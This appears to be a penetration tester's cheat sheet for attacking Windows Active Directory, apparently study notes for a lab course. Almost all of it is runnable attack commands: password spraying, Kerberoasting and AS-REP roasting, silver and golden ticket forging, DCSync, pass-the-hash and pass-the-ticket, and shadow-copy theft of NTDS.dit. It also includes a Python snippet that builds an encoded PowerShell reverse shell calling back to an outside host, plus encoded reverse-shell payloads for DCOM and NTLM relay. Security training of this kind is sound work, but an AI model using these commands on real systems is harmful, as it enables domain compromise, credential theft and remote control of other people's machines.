Active Directory
Enumeration
Manual Enumeration
# Display users in the domain
net user /domain
# Display info about the user jeffadmin
net user jeffadmin /domain
# Display groups in the domain
net group /domain
# Display members in specific group
net group "IT Department" /domain
# Display PDC of a domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
## Enumeration with PowerView
Import-Module .\PowerView.ps1
# Get info about the domain, users and groups
Get-NetDomain ; Get-NetUser ; Get-NetGroup
# Domain computer overview
Get-NetComputer | select operatingsystem,dnshostname
# Scanning the domain for machines where our user has local administrative privileges
Find-LocalAdminAccess
# Checking logged-on users on client74
Get-NetSession -ComputerName client74 -Verbose
.\PsLoggedon.exe \\client74
## Enumeration Through SPN
# Listing the SPN accounts in the domain
Get-NetUser -SPN | select samaccountname,serviceprincipalname
# Listing SPN linked to iis_service user account
setspn -L iis_service
## Enumerating Object Permissions
# AD ACE permission types
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit the ACEs applied to the object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to the object, e.g. a group
# Enumerating ACLs for the "Management Department" group (ObjectSID, ActiveDirectoryRights, SecurityIdentifier)
Get-ObjectAcl -Identity "Management Department" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
# Converting the SecurityIdentifier into name
"S-1-5-21-1987370270-658905905-1781884369-512" | Convert-SidToName
## Enumerating Domain Shares
# List domain shares; add -CheckShareAccess to show only the ones accessible to us
Find-DomainShare
Automated Enumeration
# SharpHound
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\sharepond -OutputPrefix "corp"
# BloodHound
sudo neo4j start # default credentials are neo4j:neo4j
bloodhound
# Custom queries
MATCH (m:Computer) RETURN m # Display all computers
MATCH (m:User) RETURN m # Display all users
MATCH (m:GPO) RETURN m # Display GPO
MATCH (m:Group) RETURN m # Display Group
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p # Display all active sessions
# PingCastle
Netexec
# Valid Users
netexec smb 192.168.147.95 -u "user" -p 'password'
# Valid local users
netexec smb 192.168.147.95 -u "user" -p 'password' --local-auth
# List Shares
netexec smb 192.168.147.95 -u "user" -p 'password' --shares
# Vulnerabilities Scan : www.netexec.wiki/smb-protocol/scan-for-vulnerabilities
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M zerologon
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M printnightmare
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M nopac
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M smbghost
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M ms17-010
netexec smb 192.168.147.95 -u 'user' -p 'pass' -M coerce_plus
AD Attacks
Password Attacks
# Usernames Bruteforce
kerbrute userenum --dc 192.168.147.97 -d corp.com -o kerbrute-userenum xato-net-10-million-usernames.txt
# Password spraying on windows and linux
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin # (check the lockout policy first so that no accounts get locked out)
Invoke-DomainPasswordSpray -UserList usernames.txt -Domain corp.com -PasswordList passlist.txt -OutFile creds.txt
.\kerbrute passwordspray -d corp.com .\usernames.txt "Nexus123!"
crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
AS-REP Roasting
# AS-REP Roasting : targets AD user accounts that have the "Do not require Kerberos preauthentication" option enabled
impacket-GetNPUsers -dc-ip 192.168.0.9 -request -outputfile hashes.asreproast corp.com/pete
.\Rubeus.exe asreproast /nowrap
hashcat -m 18200 hashes.asreproast rockyou.txt -r best64.rule --force
# Only list the affected user accounts (without -request)
impacket-GetNPUsers -dc-ip 192.168.0.9 corp.com/pete
Get-DomainUser -PreauthNotRequired
# If we have GenericWrite or GenericAll permissions on another AD user we can modify that user's userAccountControl (UAC) attribute so that Kerberos preauthentication is not required
Invoke-ACLScanner -ResolveGUIDS | where {$_.ActiveDirectoryRights -eq 'GenericAll'}
Kerberoasting
# Kerberoasting : request a service ticket (TGS-REP) and crack it offline to obtain the cleartext password of the service account
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
impacket-GetUserSPNs -request -dc-ip 192.168.171.70 corp.com/pete
hashcat -m 13100 hashes.kerberoast rockyou.txt -r best64.rule --force
# If we have GenericWrite or GenericAll permissions on another AD user we can set an SPN on that user, kerberoast the account and crack the password hash
Silver Tickets
# Silver Ticket : forges a TGS ticket for a specific service using the service account's password or NTLM hash. We need: the SPN account's password hash, the domain SID and the target SPN
# 1. SPN password hash => sekurlsa::logonpasswords
# 2. Domain SID : take the user SID from whoami /user and omit its last component, the RID (e.g. the 4 trailing digits) => whoami /user
# 3. Target SPN => HTTP/web04.corp.com:80
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
DCSync Attack
# Impersonates a DC to request replication of user credentials. The Domain Admins, Enterprise Admins and Administrators groups have this right by default
lsadump::dcsync /user:corp\dave
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"P@ssw0rd"@192.168.50.70
GPO
# If we have access to a GPO (GenericAll, GenericWrite, WriteProperty). See www.thehacker.recipes/ad/movement/group-policies
# List GPOs : Get-GPO -all ; apply GPO changes : gpupdate
python3 pygpoabuse.py 'corp.com/user:pass' -gpo-id '469...D81' -command 'net user gpoabuse Password123! /add && net localgroup administrators gpoabuse /add' -v
Lateral Movement
WMI / WinRM
# WMI (port 135) : Remote Procedure Calls (RPC)
# We need the credentials of a member of the Administrators local group
wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
# With PowerShell we can use it to get a reverse shell after base64-encoding the payload (see the Python snippet below)
$username = 'jen'; $password = 'Nexus123!'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; $options = New-CimSessionOption -Protocol DCOM; $session = New-Cimsession -ComputerName 192.168.189.73 -Credential $credential -SessionOption $Options; $command = 'calc'; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
# WinRM (ports 5985/5986) : Microsoft Windows Remote Management
# We need a domain user with Administrators or Remote Management Users privileges
winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
# Powershell
$username = 'jen'; $password = 'Nexus123!'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; New-PSSession -ComputerName 192.168.189.73 -Credential $credential;
Enter-PSSession 1
import sys
import base64
def _encode_powershell(script):
    """Return `script` as the base64 string that `powershell -e` accepts.

    -EncodedCommand expects UTF-16 text; Python's 'utf16' codec prepends a
    2-byte BOM, which is sliced off before base64-encoding.
    """
    return base64.b64encode(script.encode('utf16')[2:]).decode()


# One-liner TCP reverse shell carried inside the encoded command. Note for
# defenders: "powershell -nop -w hidden -e <base64>" is a well-known
# command-line pattern that process/command-line logging rules commonly flag.
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell -nop -w hidden -e " + _encode_powershell(payload)
print(cmd)
PsExec
# We need a user in the local Administrators group, the ADMIN$ share must be available and File and Printer Sharing has to be turned on
.\PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd
Pass the Hash (PtH)
# Pass the Hash from Windows Using Mimikatz:
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe" exit
# Pass the Hash with PowerShell Invoke-TheHash (Windows)
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <user> -Hash <hash> -Command "whoami" -Verbose
# Pass the Hash with Impacket (Linux); alternatives: impacket-wmiexec, impacket-atexec, impacket-smbexec
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
# Pass the Hash with CrackMapExec (Linux)
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
# Pass the Hash with evil-winrm (Linux)
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
# Enable Restricted Admin Mode to Allow PtH with RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# Pass the Hash with RDP (Linux)
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
Pass the Key / OverPass the Hash
# Mimikatz - Pass the Key/OverPass the Hash
sekurlsa::pth /domain:domain.htb /user:user /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f /run:powershell
# Generate a TGT by authenticating to a network share, converting the NTLM hash into a Kerberos TGT
net use \\files04
klist # Listing Kerberos tickets
.\PsExec.exe \\files04 cmd # Opening remote connection using Kerberos auth
# Mimikatz - Extract Kerberos Keys
sekurlsa::ekeys
# Rubeus - Pass the Key/OverPass the Hash
Rubeus.exe asktgt /domain:domain.htb /user:user /aes256:b21c99f..SNIP..da3fe60 /nowrap
Pass the Ticket (PtT)
# Pass the Ticket : export a TGS ticket of a user and use it to authenticate to a specific service
# Mimikatz - Export Tickets
sekurlsa::tickets /export
# Rubeus - Export Tickets
Rubeus.exe dump /nowrap
# Rubeus Pass the Ticket
Rubeus.exe asktgt /domain:domain.htb /user:user /rc4:3f74a71..SNIP..2f077b1ce50f /ptt
# Another way is to import the ticket into the current session using the .kirbi
Rubeus.exe ptt /ticket:RND-user@krbtgt-domain.htb.kirbi
# Convert .kirbi to Base64 Format
[Convert]::ToBase64String([IO.File]::ReadAllBytes("RND-user@krbtgt-domain.htb.kirbi"))
# Pass the Ticket - Base64 Format
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIzSrk/gHuER2XRLdV/<SNIP>
# Mimikatz - Pass the Ticket
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
dir \\DC01.inlanefreight.htb\c$
# Mimikatz - PowerShell Remoting - Pass the Ticket
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
powershell
Enter-PSSession -ComputerName DC01
DCOM
# We need RPC port 135 and local administrator access
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.163.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e base64_revshell_encode","7")
Relaying Net-NTLMv2
# Start ntlmrelayx for a relay attack targeting 192.168.0.2; the -c payload is the www.revshells.com PowerShell #3 (Base64) one-liner
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.0.2 -c "powershell -e JABjAGwAaQBlAG4AdA..."
Active Directory Persistence
Golden Ticket
# Golden Ticket : create TGTs with the use of krbtgt password hash
# We need a Domain Admins group account or access to the DC
lsadump::lsa /patch # Dumping the krbtgt password hash from DC.
# From a compromised machine or our attack machine
kerberos::purge # Delete any existing Kerberos tickets
# Creating a golden ticket. The domain SID can be taken from whoami /user (omit the trailing RID)
kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
PsExec.exe \\dc1 cmd.exe # Execute cmd on DC, using hostname instead of IP to use kerberos auth
Shadow Copies
# Shadow copy of the entire C: drive using cmd.exe. It can be used to extract the hashes and Kerberos keys of all AD users
vshadow.exe -nw -p C: # note the shadow copy device name; it is used in the next command
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
# In our attack box
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL